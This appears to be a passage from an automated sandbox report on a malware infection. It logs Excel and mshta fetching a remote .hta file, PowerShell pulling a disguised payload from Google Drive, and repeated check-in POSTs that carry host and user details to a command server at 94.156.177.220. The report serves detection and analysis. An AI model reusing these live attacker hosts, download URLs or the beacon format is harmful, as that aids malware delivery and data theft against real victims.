                                                                                              Oct 24, 2024 21:24:08.611452103 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:09.780390024 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:09 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.224920094.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:10.050141096 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:10.055685043 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:14.272247076 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              34192.168.2.224920194.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:14.421621084 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:14.427514076 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:15.557713032 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:15 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              35192.168.2.224920294.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:15.726511002 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:15.731889009 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:16.929487944 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              36192.168.2.224920394.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:17.094152927 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:17.099666119 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:18.131926060 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:17 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              37192.168.2.224920494.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:18.283521891 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:18.288921118 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:19.432138920 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:19 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              38192.168.2.224920594.156.177.220801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:24:19.579586983 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                              Host: 94.156.177.220
                                                                                              Accept: */*
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Encoding: binary
                                                                                              Content-Key: 508F6F5C
                                                                                              Content-Length: 149
                                                                                              Connection: close
                                                                                              Oct 24, 2024 21:24:19.585022926 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                              Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                              Oct 24, 2024 21:24:20.593719959 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.1
                                                                                              Date: Thu, 24 Oct 2024 19:24:20 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 23
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              Status: 404 Not Found
                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                              Data Ascii: File not found.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.22491635.159.62.2444433596C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 19:22:36 UTC319OUTGET /ZDFWtO HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: mpa.li
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 19:22:36 UTC468INHTTP/1.1 302 Found
                                                                                              Server: nginx
                                                                                              Date: Thu, 24 Oct 2024 19:22:36 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 105
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 19:22:36 UTC105INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 35 2f 6f 75 2f 6e 69 63 65 67 69 72 6c 77 69 74 68 6e 65 77 74 68 69 6e 67 73 77 68 69 63 68 65 76 65 6e 6e 6f 62 6f 64 6b 6e 6f 77 74 68 61 74 6b 69 73 73 69 6e 67 6d 65 2e 68 74 61
                                                                                              Data Ascii: Found. Redirecting to http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.22491655.159.62.2434433868C:\Windows\System32\mshta.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 19:22:42 UTC343OUTGET /ZDFWtO HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: en-US
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: mpa.li
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 19:22:42 UTC468INHTTP/1.1 302 Found
                                                                                              Server: nginx
                                                                                              Date: Thu, 24 Oct 2024 19:22:42 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 105
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 19:22:42 UTC105INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 35 2f 6f 75 2f 6e 69 63 65 67 69 72 6c 77 69 74 68 6e 65 77 74 68 69 6e 67 73 77 68 69 63 68 65 76 65 6e 6e 6f 62 6f 64 6b 6e 6f 77 74 68 61 74 6b 69 73 73 69 6e 67 6d 65 2e 68 74 61
                                                                                              Data Ascii: Found. Redirecting to http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.2249168142.250.186.464431224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 19:23:01 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                              Host: drive.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 19:23:01 UTC1319INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 24 Oct 2024 19:23:01 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jrETwbn4hplHXA4sSdArnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.2249169172.217.16.1934431224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 19:23:03 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 19:23:06 UTC4906INHTTP/1.1 200 OK
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2239109
                                                                                              Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                              X-GUploader-UploadID: AHmUCY0yXYId2Hb7TE9gYWlrdarS6jbYxdkHa0MTlUmajWf0UXZc_zLBY5Z2Nx1dF-q0HN5YT61Z2FIz-w
                                                                                              Date: Thu, 24 Oct 2024 19:23:05 GMT
                                                                                              Expires: Thu, 24 Oct 2024 19:23:05 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=WqxmdA==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close
                                                                                              2024-10-24 19:23:06 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                              2024-10-24 19:23:06 UTC4886INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                              Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                              2024-10-24 19:23:06 UTC1324INData Raw: 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23
                                                                                              Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#
                                                                                              2024-10-24 19:23:06 UTC1378INData Raw: f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b
                                                                                              Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+
                                                                                              2024-10-24 19:23:06 UTC1378INData Raw: c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc
                                                                                              Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                              2024-10-24 19:23:06 UTC1378INData Raw: 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25
                                                                                              Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%
